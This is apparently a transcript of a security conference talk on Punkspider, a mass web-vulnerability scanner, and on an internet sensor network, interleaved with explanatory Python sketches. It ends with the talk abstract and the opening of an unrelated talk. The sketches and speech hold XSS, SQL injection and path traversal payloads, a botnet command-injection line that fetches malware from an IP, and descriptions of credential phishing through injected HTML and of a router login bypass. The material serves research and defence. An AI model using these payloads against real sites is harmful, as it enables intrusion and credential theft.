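        verdict = "open recursive" if is_open_resolver(candidate) else "not open / no answer"
        print(candidate, verdict)
```

The subtleties Jason mentions — rate limiting, retries, not tripping abuse alarms, doing this across the whole IPv4 space — are where the real work goes; the per-host test itself stays this simple.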
Coming from pure cybersecurity into that risk focus, there was a bit of a mind shift that had to happen on my part: some things that are really good for pure cybersecurity actually don't inform risk that well, and there are a lot of other tools you can use in their place. So I've been working on this system with that very much in mind, and a lot of the new directions and new tooling I'm interested in really go down that path. That can be seemingly simple things, like just identifying what a corporation has — what are their assets, where are they? Some corporations honestly can't even answer that question for you, so doing this in a broad, autonomous fashion is really interesting, and it informs other risk metrics. Then there are proxy measures, like what jobs they're hiring for and what technologies show up in those job ads — how does that potentially inform what they're doing in-house? We also have some passive sensors, I'll call them. We're monitoring the global certificate transparency logs, so pretty well any SSL certificate that's generated, we record a copy of in near real time. And then we have another significant component, which is our listening network: basically low-interaction honeypots distributed globally and all across the IPv4 spectrum, out there just listening. They can identify the early onset of any sort of broad malicious activity — or benign activity, for that matter — and we can use that to profile the threats showing up in, say, a SOC's logs. SOCs have a lot to deal with; they don't need to be chasing down leads that end up just being Google crawlers or the university of whatever doing research. Similarly, we can use this to inform a risk score: for any given corporation, if we know what their assets are, have any of them been involved in, say, being part of a botnet? And if so, for how long? Getting popped once last year is one thing; getting popped and then remaining part of a botnet for six months is something else — that speaks to their detection and remediation policies. Of course, I still have the amplification attack sinkhole. It's not the most particularly valuable sensor, but it's an oldie and a goodie. And then, honestly, I started learning that if you just start registering with places and looking under some rocks, there's some really good data you can get for free. I mean, ARIN and WHOIS — sorry, ARIN and IANA — can provide lots of data. So I collect WHOIS data on IP addresses, which gives you ASN information, organization details and points of contact. I do get domain WHOIS, but that's such a low-value signal it's almost not worth mentioning. One of the ways that Alex and I are collaborating right now, actually, is on analyzing malware that we capture in our network: doing fingerprints, looking for what sort of network behavior might be going on, and trying to integrate that with some of the other tools to get a broader picture of what's really going on on the internet. And then I also record all the information from the DNS root zone files for about a thousand top-level domains — basically anything that's not a country code.
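A toy version of one node in that listening network looks something like this (the port number and plain-print logging are arbitrary choices for the sketch; real sensors cover many ports and feed a pipeline, but the core idea really is this small):

```python
#!/usr/bin/env python3
# Minimal low-interaction listener: accept TCP connections on one port, log who
# connected and the first bytes they sent, then hang up.
import socket
from datetime import datetime, timezone

def listen(port=2323):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(16)
    print(f"listening on :{port}")
    while True:
        conn, (peer_ip, peer_port) = srv.accept()
        conn.settimeout(3)
        try:
            first_bytes = conn.recv(256)      # whatever the scanner/bot blurts out first
        except socket.timeout:
            first_bytes = b""
        finally:
            conn.close()
        stamp = datetime.now(timezone.utc).isoformat()
        print(f"{stamp} {peer_ip}:{peer_port} sent {first_bytes!r}")

if __name__ == "__main__":
    listen()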
Those zone files can be really interesting just for identifying suspicious domains as they pop up — they might be used as a C2 server, or for phishing, or something like that — but they can also be used in actually identifying the assets of a company. The other thing I forgot to mention, in terms of proxy metrics for corporations: you can also do things like look at their SEC filings and try to evaluate whether, for a company of this size in this industry, their funding in cybersecurity is sufficient. And lastly, no cybersecurity tool is complete if you're not pulling in some GeoIP data. So this has been a big undertaking over a lot of years. I started off small, but I needed to rent some servers and things, and I figured I was more interested in spending money on something I can hold in my hand and keep for a long time. So instead of buying a lot of cloud services, I actually convinced my wife to let me build a small data center in the basement when we were redoing the basement anyway. The middle picture here is the first version of that, where I've got a whole bunch of old desktops and a few used Dell R710s, which, bang for your buck, are awesome little machines — real little workhorses. And I had to become an internet service provider, which meant registering with the government and applying for a license. I've got a BITS license, a basic internet telecom service license, which means I can actually sell internet to my neighbors — which is funny, although there's not really much good reason to do so; it's not exactly cost effective. But I have used some cloud services. I've done a lot of scanning for years using Linode, and Linode has always been really, really supportive. They've asked me to abide by a number of very reasonable guidelines, and otherwise they provide me a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome. So if by chance anyone from Linode is out there — the trust and safety team in particular, who I feel like I'm on a first-name basis with — thank you very much. And one thing I'd like to say about this is that I had the lovely opportunity of seeing this project from beginning to end — not that I live with Jason and his wife, but I got to hear about it from "hey, I'm thinking of building a data center" all the way to that middle picture. Which, by the way, just to point out: Jason is a woodworker, metalworker, astronomer, blah, blah, blah — he does fucking everything, and he's good at it too. So he built his own little server rack right there, and you saw that once he outgrew it, he bought a big fucking server rack. That's just fucking Jason — he's crazy. That's true. And it's insane that he literally built an internet service provider in his basement, and he's like, yeah, no big deal, just a Saturday. So, anyway. That's all. No, it's true, I was quite proud of that little server rack — I used pocket holes and everything, it was fun. But, you know, Alex, we've been talking a big game here, man. What do you say we put our websites where our mouth is? I don't know, that's a terrible joke. Sure. No, I like it — let's put our websites where our mouth is. All right. So, a little preface on this one.
So we do have a user interface that has been revamped since the one Alex showed. However, it is not released yet — we are releasing a UI in the fall of this year. This is just our internal, alpha-use-only version. Functionally, I'm sure it bears some resemblance to what we will end up releasing, but the one in the fall is going to be much, much nicer than even this. So, this is Punk Spider. No good search engine is complete without a giant search bar, so up at the top here I'm just going to pick a random domain — something that may or may not be a little bit popular — and do a little search. You can see that this tumblr.com website had no vulnerabilities, but there actually is this one called kickstarter.com, which just so happens to have, I see here, a cross-site scripting vulnerability. So we display that, we show the parameter we're using to abuse it, and then we've got these handy-dandy buttons: one you can click to test the vulnerability, which will actually open up the web page with the payload and show you that it really is working, and one to copy a curl command, which is handy if you want to change the text or do whatever. We also have a fairly complex way of scoring these websites. Our thinking is that any one of the vulnerabilities we're testing for is just insane to have on a website in modern times — there's no excuse for it — which means that if you have even one cross-site scripting vulnerability, your security posture is basically a giant dumpster fire. So we, I think very appropriately, rank these websites on a scale of one to five dumpster fires, and that's what you can see here. Another kind of cool thing, and a way we've already started to work together between the two projects, is port scan data. This is an easy lift, all things considered, but you can click on ports and see that this one, for example, is running what looks like a mail server and an OpenSSH server. So we're starting to bring these data sets together and answer some communal questions. But at the end of the day, what we want this to be is a giant database that users can search: you can look at your own domains, you can check the domains that you visit or frequent. We want this to be a really awesome security tool for the masses. There are a few limits that we've had to walk a fine line on — of course, we don't want people coming here to just rip off the database and go do whatever — but we'll circle back to that. But yeah, did you have anything to add, Alex? No, no, that was an excellent overview of our user interface. You'll see the little country codes, of course, which, as Jason mentioned, are essential to any security tool. Absolutely. So, you know, Alex, it's funny: before this talk, I was actually on this website called archive.org, which I know is really, really popular, and this new browser extension I've got has this little eight on it, and it's trying to tell me something. Do you know anything about that? I don't. You don't? No, I'm just kidding, I'm sorry. Thanks for the lead-in, buddy. Yeah, so what we really wanted to do here — there are a few goals, and we're going to talk about them a little bit later — but one really big goal we have is that we want to engage not only with the security community.
I know we're speaking at DEF CON, and you're probably part of the security community, but I think it's really important that we release our stuff out there so that it's digestible by normal humans. So if you look at the browser plug-in, it's really simple. You may have already guessed this: there are several vulnerabilities on archive.org. It has a one-dumpster-fire rating, which I believe is appropriate for the number and types of vulnerabilities found. And probably the most important part of this plug-in, frankly, is just that big red spider. That red button just tells you: hey, this website is dangerous. So anybody — whether they know something about web security, know nothing about web security, whatever — can really use this. One other really cool feature of this plug-in is the trip report. At the very bottom right of the plug-in, you can see it says trip report, and if you click on that — we've only gone to sites with cross-site scripting so far, so the results are kind of obvious — all we're doing is taking basic types of extremely serious web application vulnerabilities and giving you a rolled-up view: in my last browsing session, how many websites did I visit that were vulnerable? That's something you might want to know. You might want to say, oh shit, okay, I've been browsing for a week and 1% of the sites were vulnerable — I want to go back, see which ones they were, and decide whether I want to give them any more of my information. Extremely important for you to know. So that's what we wanted to do with this browser extension. It's also got a little reset button you can press to reset your stats. And one particularly important thing — Jason, if you can just go to any random website, I don't know, is Google a pretty good one? — and open up the extension for me. Yeah. You can see that it's grayed out, right? That would mean Punk Spider doesn't currently have any data on it. Or is it — I'm sorry, Jason? Yeah, I went to Google, so it's been scanned. Yeah, it's green — it's been scanned. Oh, fuck me, it's green. Okay. So Google has been scanned, so it's going to tell you if you're clean as well. Another state of this plugin is gray, which means we haven't scanned the site. If it is gray, you have the option to submit it for a scan, and the scan is really, really fast — I've never seen it take more than three or four minutes. So that's currently the plugin. I wanted to show it with a major website, like archive.org, because most of you have probably heard of it, and it's a very well-known site. But we can move on to the next one. Yeah, so just to illustrate the vulnerability here, I'll hit reset, and you can see it executing the payload, printing out the message that we programmed. Yeah, which is totally elite. Yeah, totally elite. All right, cool, let's move on to the next one. LendingTree. All right, go for it. All right, well, these fucking LendingTree people. Okay, so LendingTree — what can I say about them? I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in their website, and I did not receive an answer. I could give you a whole rant on my views on fucking responsible disclosure, but I'm going to save it, and just say that, as you can obviously see from Jason loading the page, this payload is executed seven times.
There's absolutely no filtering going on here, and you can also see that it's just in a basic-ass query parameter there, right? And that payload is not very complicated — it's basically the standard cross-site scripting payload with one thing added. So there's really no excuse. We contacted LendingTree — let's see, a journalist contacted LendingTree, and I contacted... no, I didn't. So two people contacted LendingTree. This was over a month ago, and we still have received absolutely no response. That, to me, is just egregious. We are not checking for really super complex second-order blind SQL injections to get a fucking out-of-band shell. This is really basic-bitch parameter injection, and we're just getting it reflected right back. Any simple website scanner — open source, paid, whatever — should really be able to catch this. Hell, you should be able to catch this shit manually if you're building the website. So it's really inexcusable, and because it's a popular website, I felt like I'd go ahead and call them out. I won't pick on them anymore, but yeah, that's all I have to say about LendingTree. It is funny, too: people complain when they get a pen test team that's not all that good and all they do is run automated tools, but they're cheap or whatever — and when we're talking about cross-site scripting and a lot of these vulnerabilities, those tools would still expose the problems. These companies are not even doing that. Yeah. And even including the time of an engineer, that's like 10 minutes — it's not a significant cost either. Anyway, moving on. All right, we've got to move through the next ones a little bit faster, but that's okay — this is a good one. This is tapas.io. It is a manga website, not about delicious, delicious tapas, but that's okay, right? As you might have guessed, if you click on the plug-in or check Punk Spider, you can see that it's red: it has a vulnerability, a cross-site scripting vulnerability. I know you didn't see an alert box pop up, but let's go through this website real quick and see what it has to say. So: pretty basic login page — username, password, login, remember me, et cetera. Okay, that's fine, right? So Jason, if you could just scroll all the way down the page for me, please. Oh, holy cow — there's this whole other login form almost completely covered by the footer. What's that? Yeah, that is the real login form for the web page. Thanks for the lead-in. This is the real login page for the website, right? All I've done — because most cross-site scripting also comes with an HTML injection vulnerability — is push it down with a bunch of BR tags, line-break tags. I pushed the real login all the way down and created a fake login up at the top. So what does that allow me to do? It means I can grab that link in the little bar right there and send it to everybody I know who uses tapas.io — from a Twitter search, a LinkedIn search, whatever search — and it's something they inherently trust. Then I can just sit back there and harvest usernames and passwords. I know there are still some cross-origin restrictions we'd need to get around — this isn't a web app hacking talk, so I won't go through those — but this is very easy to turn into stealing usernames and passwords, is my point. And that sucks.
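The check being called "basic" here really is small. A hedged sketch of a naive reflected-XSS test (placeholder URL and parameter; it misses DOM-based and stored XSS, and should only be pointed at sites you are authorized to test):

```python
#!/usr/bin/env python3
# Drop a unique marker wrapped in a script tag into a query parameter and see
# whether it comes back verbatim in the HTML -- exactly the class of bug shown
# in these demos.
import uuid
import requests

def reflects_unescaped(url, param):
    marker = f"xss{uuid.uuid4().hex[:8]}"
    probe = f'"><script>{marker}</script>'
    resp = requests.get(url, params={param: probe}, timeout=10)
    # Verbatim reflection of the <script> wrapper is the red flag; an
    # HTML-encoded reflection would not match this string.
    return probe in resp.text

if __name__ == "__main__":
    target = "https://example.com/search"   # placeholder target and parameter
    print("likely reflected XSS" if reflects_unescaped(target, "q") else "no naive reflection found")
```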
So to anybody out there who's like, "cross-site scripting is not that serious": you're wrong, and this is why. Yeah, and our tests aren't looking just for cross-site scripting, although there are many of those — we're also doing SQL injection, as Alex said before, and this is an example of that. So, primeinvestor.in, presumably something to do with finances. They've got a login page; they might have pretty sensitive information behind it. And they're not sanitizing their inputs, so we were able to have the web server execute a SQL query just by putting it into a text form or something like that. It's also kind of interesting that even the error can give you back more information — this is clearly a WordPress site. But this is crazy: all they're doing is not sanitizing their input. Most frameworks nowadays won't let you avoid it; you almost have to go out of your way for this to still be a problem. And it's a huge problem, because this is being executed with the same permissions as the web server itself, and the web server must have read-write permissions on all the tables related to users and things like that. A website that has this kind of problem — it wouldn't surprise me in the slightest if they had plain-text passwords stored in the database, so potentially you could just dump the whole thing. At the very least, they're probably not salting them, so you could just crack the hashes. This is a massive problem, really. I think you have more to say on that, Alex? I do. We think of sites like this, like primeinvestor.in, as not a huge deal — whatever, you found some SQL injection, good job. The problem is that we can no longer rely on that argument. We are in the age of data breaches. We're at a point where data breaches are so prevalent that you sometimes have tens of trillions of records in leak aggregators, meaning that every breach — whether it affects you directly, whether it's a website you actually care about, whether the username and password you used on that website was sensitive or not — can still affect you. So websites that have nothing to do with you are now seriously affecting the security of corporations and people in general. Like I said, we're in the age of the data breach, and stuff like this is really inexcusable. To give you an idea: all of the websites we're showing are in Alexa's top 5,000. You may not have heard of some of them, but they are the top websites on the internet, so to have something like this is really just irresponsible, quite frankly. It's completely irresponsible, and it's causing major problems across the internet these days — even the fucking Colonial Pipeline hack was a credential stuffing attack against their VPN. Completely unrelated websites get breached, and then a VPN gets breached. We can't have websites like this out there just giving away usernames and passwords. We also know now, from all these aggregators being built and all the password research going on, that people are fucking terrible at passwords — we tack a couple of characters onto "secret" and all of a sudden that's a secure password. But the other thing is that people reuse their passwords everywhere, so even if it's a site you don't necessarily care about, if you reuse that password in one single other place, somebody could easily find it. And that's all I have to say about that. Yeah.
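To make the "just sanitize your inputs" point concrete, here is a self-contained illustration with sqlite3 of the same login check written both ways — string formatting, which is injectable, and bound parameters, which is what every modern framework pushes you toward:

```python
#!/usr/bin/env python3
# The classic injection demo: an in-memory database, one user, and the same
# login check written insecurely and securely.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

def login_vulnerable(name, password):
    # User input spliced straight into the SQL string -- injectable.
    query = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return db.execute(query).fetchone() is not None

def login_safe(name, password):
    # Bound parameters: the payload is treated as data, not SQL.
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone() is not None

if __name__ == "__main__":
    payload = "' OR '1'='1"
    print("vulnerable version:   ", login_vulnerable("alice", payload))  # True -- auth bypassed
    print("parameterized version:", login_safe("alice", payload))        # False -- just a weird password
```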
I think the next example is actually a pretty cool one. This is a traversal attack, which means we can put in the URL the path to a different file — something the web server should definitely not be allowed to access, or certainly shouldn't be showing to a random website visitor. Here we're doing it with the passwd file in Linux, which gives us a list of all the different users and groups, including all the system users that this server has. And this is a massive problem, because it basically means we can view files on the server easily. We could go through this list, find a username that we think is an actual person, and then try to, for example, view their SSH private key. If we had that, then we could also take a few guesses: maybe, if it's a VM just hosting this website, it's using some common framework like WordPress. WordPress has some default install folders, so maybe we can go look at the config file and get the database password. Now we could potentially log into the server and access the database freely — or the database of another site being hosted on the same VM. This server is vulnerable, which means it's really putting all of its neighbors at risk. And again, it's just so silly — fix the permissions. Yeah, and lastly, this one is a bit of beating a dead horse, but Kickstarter has a cross-site scripting vulnerability. I just hit refresh here — nothing shows this off better. Kickstarter is a bigger organization; they can afford, like, one intern to just go through and check for obvious scripting vulnerabilities and stuff like that. There's really no reason for this. You give this company money, they have login credentials, they have user data — I don't even know what else they probably have on the back end — but you're putting people at risk with this. Yeah. Cool, so let's head back to the slides. All right, so, how is this being used, Alex? Wonderful question, Jason. I feel like we're news anchors or something, but anyway. You're probably wondering: we're releasing a fuck ton of vulnerabilities, and we're just giving them out for free — so how do you access them? A few ways you can use this. One is the browser extension, which we've shown you — of course, very, very useful; please download it and use it if you like it. There's a free and open REST API. You can search by vulnerability and domain name; wildcards are all allowed, even character wildcards and things like that — full wildcard search, no limitations there. There's a CLI tool you can use as well, built by Mr. Hopper here, so you can get stuff like that too. Soon to come: the search engine interface, already in alpha — Jason already showed you some of that — where you can search by vulnerability, domain name, wildcards, again all in play; we don't limit any of that. A Recon-ng module — Tim Tomes, you know him, wonderful man, wonderful software. A Hate mail module if you use that. A Metasploit module, just because everything needs a Metasploit module. And really, anything you all feel you would like to see built with this data — just shoot us ideas; we can build it, or you can submit something open source, whatever.
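Roughly what the traversal test described a few paragraphs back boils down to, as a hedged sketch (placeholder URL and parameter; real scanners also try URL-encoded and nested variants, and you should only run this against targets you are authorized to test):

```python
#!/usr/bin/env python3
# Feed a few ../ payloads to a parameter that takes a file or page name and
# look for the telltale first line of /etc/passwd in the response.
import requests

PAYLOADS = [
    "../../../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
]

def traversal_check(url, param):
    for payload in PAYLOADS:
        resp = requests.get(url, params={param: payload}, timeout=10)
        if "root:x:0:0:" in resp.text or "root:*:0:0:" in resp.text:
            print(f"possible traversal with payload: {payload}")
            return True
    return False

if __name__ == "__main__":
    traversal_check("https://example.com/download", "file")   # placeholder target
```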
The main thing is: let us know how we can support you — help us help you, basically, and we will help you out. Moving on from there: how do we do this? We get this question a good amount — how do you scan that many websites, did you have to create your own scanner, do you have your own fucking internet service provider, et cetera, et cetera. The real answer is that it's just a fuck ton of work and a lot of benchmarking. The original Punk Spider was built on old technology, so there was a bunch of benchmarking I had to do in terms of what's important here: computing power, memory, bandwidth, I/O, all kinds of different things. So there were all kinds of tests we needed to run to make sure everything was running as smoothly and as quickly as possible. We had some creative engineering in there: we repurposed a lot of technology that's really built for search engines and data analytics — all of that stuff is being used in the backend of Punk Spider, we're just completely repurposing it for offensive security. The last thing we did is we embraced the cloud, right? Rode that snake, meaning we're addicted — all of a sudden addicted to heroin, I mean AWS. Same thing. What's that? Same thing. Same thing, yeah, very similar things to be addicted to, both costing thousands of dollars a month — AWS is probably more dangerous — but we really embraced it, and we realized the world is moving in that direction, so we may as well take advantage of it. So, next slide, please, sir. All I want to show you here is that we do have metrics and monitoring on the backend of this system. Like I said, it is a very well-funded, well-engineered system at this point. At the top left you'll see the word Ferret — Ferret is our custom-built scanner — and all I really wanted to show you is that there are a bunch of different scan nodes, and each of those scan nodes is handling thousands of different websites. This will get reshuffled as more data comes in or as the cluster is scaled — which, to me, it looks like it needs to be scaled a little more — but it's a good view into the fact that we are doing truly mass distributed scanning. So we can move on to the next slide. Yeah, so actually you can skip this slide. Okay. All right, thanks, sir. So how does this work? I want to give you the basic architecture of Punk Spider. We have a Kafka queue — Kafka is a simple queuing system: something comes in, and something comes out to a system that's ingesting it. The reason we need a queuing system is that we are submitting so many URLs that we need a piece of technology that is distributed and can handle the level of data we're talking about, because we're submitting something like tens of billions of domains, which means hundreds of billions, if not trillions, of actual web pages. So queuing technology is really important here, and it's used very much throughout Punk Spider. Next slide, please, sir. The ferrets. The ferrets, right. Because that Kafka queue — again, distributed — just gives you a website, we need something to then scan that website. As I mentioned, that application is called Ferret: our web app fuzzer. It works really quickly, works in a distributed manner, with Kubernetes auto-scaling.
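Before getting to how many ferrets it takes to drain that queue, here is a toy version of the queue-plus-workers shape (kafka-python, with made-up broker and topic names — a sketch of the pattern, not Punk Spider's actual pipeline): one side pushes URLs onto a topic, and any number of scanner workers in the same consumer group pull them off, so each URL gets handled exactly once.

```python
#!/usr/bin/env python3
# Toy URL queue: `python3 queue_demo.py` enqueues a couple of URLs,
# `python3 queue_demo.py worker` runs a consumer that "scans" them.
import json
import sys
from kafka import KafkaConsumer, KafkaProducer

BROKER = "localhost:9092"      # placeholder broker
TOPIC = "urls-to-scan"         # placeholder topic

def enqueue(urls):
    producer = KafkaProducer(bootstrap_servers=BROKER,
                             value_serializer=lambda v: json.dumps(v).encode())
    for url in urls:
        producer.send(TOPIC, {"url": url})
    producer.flush()

def work():
    consumer = KafkaConsumer(TOPIC,
                             bootstrap_servers=BROKER,
                             group_id="scanners",   # same group => the work is shared out
                             value_deserializer=lambda v: json.loads(v.decode()))
    for msg in consumer:
        url = msg.value["url"]
        print(f"scanning {url} ...")                # a real worker would run the fuzzer here

if __name__ == "__main__":
    if sys.argv[1:] == ["worker"]:
        work()
    else:
        enqueue(["https://example.com", "https://example.org"])
```

The design point is the same one made above: because the queue and the consumer group do the coordination, scaling up is just "start more workers".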
So we need a lot of ferrets to really be able to scan all of these websites and get all of the data that we want and then present that back to you, which is done in the next slide. And you see that we index these results into two different things. One is RDS for stats. And the other thing is Cloud Search to obviously build the search engine for everybody. So all of this is kind of a simplified view into the entire thing. This feeds back into the queuing system, actually. And yeah, this does back into the queuing system. And can even create more URLs for us to scan and things like that. So that's basically how it works on the backend. What I really wanted to point out is that everything's fucking distributed. Everything is distributed. That's why I have pictures of lots of ferrets, pictures of lots of Kafka, pictures of lots of results, right? Everything is distributed. So we can scale Skies and Linder. Cool. And then we grab more shit from IO station, which Jason's gonna tell you about. Yeah, so running a data center has been a lot of work. It's interesting. It's one of those things where you have to decide where you wanna put your time and effort. I've built this system on Postgres, which is awesome. If there's really specific reason, I'll use something else, but I use Postgres a lot. RabbitMQ I used for years. However, I've got, I had an issue where it would just like disconnect consumers all the time. So all the sensors would be passing messages to it and then the consumers would get disconnected. And then the queues would get so big that they would stop delivering messages, which makes no sense. And then even worse, they'd continue to get big and eventually explode the nodes. So I eventually replaced it with Kafka, which isn't perfect, but I've definitely had much better results overall. And the rest of it is kind of bash and Python because I've been developing this myself to this point. And so kind of simplicity is key. We're moving as much complexity as you can in a lot of ways will make your life a little easier. When it's just a one person operation, that is. So Alex showed his UI, so I thought it tossed mine up here too. It's pretty simple. You type in an IP address, search it, it shows on the map where it's resolving. We've got geoIP and who is data. And then for the port scan data, it shows each port in a different card. And I think I mentioned before, it's scanning over 25 ports. There's a lot of custom extractions that are going on in this and then of course the normal stuff, like service identification and banners and stuff like that. And it's too much to show in one screenshot, but below is where all the listening service data is. And then there's SSL search and things like that. This website has never been public nor probably will it ever be, but you know, can't let someone show the world UI alone. It's so appropriate. So just a really quick little case study, I guess, of something that has been coming across IOS stations. So there's this thing called the Mozzie Botnet. Back in 2019, I started observing it. It's known to other people. It's a really big botnet right now. And basically it's trying to command injection and servers. So these are the two URLs that I see most of the time. And you can see one of them is next file equals netgear.cfg and then it pulls, we get pulls this thing from an IP and port, Mozzie.m is the file name and then it runs it. And then similarly, the other one does the same thing, but Mozzie.a and it executes it slightly differently. 
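Pulling the download host and port out of those Mozi injection attempts is mostly pattern matching over the sensor logs. A rough sketch is below; the captured request line is fabricated for illustration and simplified from what real sensors record, but the Mozi.m / Mozi.a filename pattern matches what was described above.

```python
# Extract where Mozi samples are being hosted from captured injection attempts.
# The sample request line below is fabricated for illustration.
import re

# Matches http://<ip>:<port>/Mozi.m or /Mozi.a inside a captured request.
MOZI_RE = re.compile(r"http://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)/Mozi\.(m|a)")

captured = [
    "GET /setup.cgi?next_file=netgear.cfg&cmd=wget http://203.0.113.50:8863/Mozi.m HTTP/1.0",
]

for line in captured:
    for host, port, variant in MOZI_RE.findall(line):
        print(f"Mozi.{variant} hosted at {host}:{port}")
```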
But basically this looks like it's trying to do this on netgear equipment at a minimum. And we know from Punk Spider that there are tons of websites that are vulnerable to injection like this. So I started digging a little bit deeper and I used this data to identify where the attacks were coming from and where the malware was being hosted. And interestingly, they were always different IP addresses. Whatever service or sorry, whatever computer was saying, go download and run this malware was never the same IP address as where it was being hosted. And they were mainly hosted in China, like predominantly, definitely some in India. And of course it's a botnet. So it's spread across the world, but there was a huge amount of it coming from China, which was interesting because then when I looked at what sensors the botnet was hitting mostly, it was really heavily hitting India, Japan, Australia, and then to a slightly lesser degree, Canada and Germany, but there were no hits in China, which was kind of funny. And I'm not trying to suggest that this is some sort of like, you know, clever state sponsored piece of malware or anything like that. I just thought it was funny that none of my Chinese servers actually saw any of this and it almost looks like kind of a geopolitical map, you know, a little bit. So yeah, China's suspiciously missing there. You know, I did dig in to look at what devices were actually being part of this botnet and it definitely looked a lot of D-Link, NEC gear and Huawei gear. I saw IP cameras, DVRs, there were some G-Pond devices, which was a little interesting. I didn't really see anything that indicated it was part of any sort of like corporate structure or anything, but the software being used are a lot of web servers, but they're all the like kind of small, lightweight ones that you see being used in sort of embedded devices and things like that, like home routers. And I did notice that the light PD version that I saw a lot of actually 1.4.39 had just a ton of CVEs and many of them were just like blanket, you know, remote code execution, vulnerability and stuff, which was kind of cool. So I did kind of poke around at a few of these, seeing like what they were showing. And I found this kind of cool example. This was just somebody part of the botnet. It has an interface that looks a lot like D-link. I didn't try to log in or anything like that. The links on the top made you log in, but I did dig around the JavaScript because it really wasn't that much actually. And I saw that it was crafting these links. So I went to a few of them directly like sysstatus.asp, for example. And, you know, I guess it doesn't always want you to log in. So if you go to them directly, the login page actually works, or sorry, is bypassed. And I was able to see all the internal DHB tables and all the routing information and all that stuff. And, you know, while this isn't some, you know, egregious vulnerability necessarily on its own, right? It's just kind of illustrating like, this is the kind of nonsense that is still all over the internet. Like I know security's been a hot topic. It's getting better, I think. I think anyway. But there's still craziness like this, where this person's router just like lets you log in and yeah, that's kind of crazy to me. So, you know, we're kind of running out of time here, but I'm sure the burning question in everyone's mind is, where is this all going? So where is it going, Alex? Right, so I just want to recap for everybody, right? So a couple of quick things. 
Created a hugely scalable system for buzzing a 5% of URLs. We found a bunch of vulnerabilities in major websites. We've even found zero days in popular form technology, right? So obviously the probably most important part of that is that we're releasing it out to you all, the public. And we want to keep these results updated while still continuing to go extremely broad. Our target is still the entire internet. It is, we're not going to let down on that target. We're going to continue engineering until we've reached that target and we can keep the records reasonably updated to a certain degree, right? So how can you kind of help us, right? So I mentioned throwing us ideas, obviously it's really helpful. But download that extension, use that CLI tool, start calling out websites. All of these things are really helpful and not only at the Punksbiter, but part of the mission of Punksbiter really. We built this for you all. So, don't really use it, basically. It's all. As far as IEO station is concerned, I think that continuing to transform my mindset from pure cybersecurity to evaluating risk and risk scoring is really interesting. So I want to continue kind of going down that path. That's not to say that there won't still be the broad internet collection tools that I've been working with and know and love, but it's just that some of the newer features that are coming out probably will be geared towards that. Especially when it comes to critical infrastructure and industrial control systems, which for anyone paying attention to the news lately, I'm sure knows has been a bit of a hot button topic when it comes to certain pipelines, which may not be named. But I think that's a really fascinating area and especially one that's obviously increasing importance. I know there's a lot of utilities and things that have really ignored their cybersecurity posture and they're starting to get bit by it. And anyways, that's something I think we need to look at. And the other one is a little bit more vague, but really trying to identify attacker infrastructure. Like are there things that we can be observing from the outside to identify what an attacker is using and how they're organizing, but maybe early or on the onset or whatever, as early as possible, obviously is better. Are there software that can be probed and identified running across the internet? Are there any sort of particular techniques or patterns or signatures or anything like that that we can extract? This one is not as well thought out, obviously, it's just something that I think we're pretty interested in tracking down long term. But anything that about wraps it up for us. So yeah, if you wanna shoot us an email or whatever, feel free, you can visit our office, but Alex and I won't be there, so. Yeah, thanks everybody for coming and listening to our talk. We really appreciate it. And thank you all for taking the time to listen to us ramble on about this system. And I hope you really enjoyed it. Yeah, thanks everyone. Take it easy. See you guys later.
|
We've been getting asked a lot for "that tool that was like Shodan but for web app vulns.” In particular WTF happened to it? Punkspider (formerly known as PunkSPIDER but renamed because none of us could remember where tf the capital letters go) was taken down a couple of years ago due to multiple ToS issues and threats. It was originally funded by DARPA. We weren’t sure in which direction to keep expanding, and it ended up being a nightmare to sustain. We got banned more than a 15 year old with a fake ID trying to get into a bar. It became a pain and hardly sustainable without a lot of investment in time and money. Each time we got banned it meant thousands of dollars and countless hours moving sh** around. Now we’ve solved our problems and completely re-engineered/expanded the system. It is not only far more efficient with real-time distributed computing and checks for way more vulns, we had to take some creative ways through the woods – this presentation covers both the tool itself and the story of the path we had to take to get where it is, spoiler alert: it involves creating our own ISP and data center in Canada and integrating freely available data that anyone can get but most don’t know is available. Come play with us and see what the wild west of the web looks like and listen to our story, it’s fun and full of angry web developers. We’ll also be releasing at least 10s of thousands of vulnerabilities and will be taking suggestions from the audience on what to search. Fun vulns found get a t-shirt, super fun ones get a hoodie thrown at them. REFERENCES: https://www.youtube.com/watch?v=AbS_EGzkNgI (Shmoo 2013 talk) https://hadoop.apache.org/ https://aws.amazon.com/kubernetes/ https://www.docker.com/ https://www.python.org/ https://www.apache.org/licenses/LICENSE-2.0 https://kafka.apache.org/ https://owasp.org/www-project-top-ten/
|
10.5446/54210 (DOI)
|
Hi, I'm Ian. I do container things. Hi, I'm Chad. I do mainframe things. And we're here to tell you a story today about some things we did together. We both live in Minneapolis, Minnesota, which is a cold, dark place where it's winter six months out of the year. Minnesotan hackers spend their long winters stuck inside doing deep dives, studying ancient arcana, and getting good at deep magic, which lends itself well to weird specializations. And that's how we ended up here. It all began in spring 2019. Like many good things, it began with a shitpost. A person involved in Dumb-Offs said, Kubernetes is the next mainframe. So, of course, I tagged Chad and it said, what do you think? I'm not qualified to speak on mainframes. I'm about as qualified to speak on mainframes as I am on beekeeping. I think I've gotten a little better at it since. But anyway, a few days later. A few days after that shitpost, we met at a local con for the first time in person and talked about our niche specializations. The similarities and differences between them. Although our worlds don't usually overlap, the cultures are different, the timeline is different. Mainframes have been around since the 50s and Kubernetes have been around for like, what, six or seven days? Our approaches had some similarities and we both knew we had some knowledge in common. In the mainframe world, it's not uncommon to patch the systems maybe once, twice a year. And in the Dumb-Offs world, people do like multiple deploys a day. Culturally, it's really different. Dumb-Offs people are really open to new things, open source software, really excited about doing things quickly and doing new stuff. And mainframes, maybe not so much. No one would ever accuse the mainframe community of being excited about change. Fair enough. Both of us had experience pulling things off that other people said were completely impossible in our respective fields. We figured how to navigate in uncharted territory. We took apart technology without dedicated tooling and with little or no prior art. We did have some things in common though. We had shared knowledge at 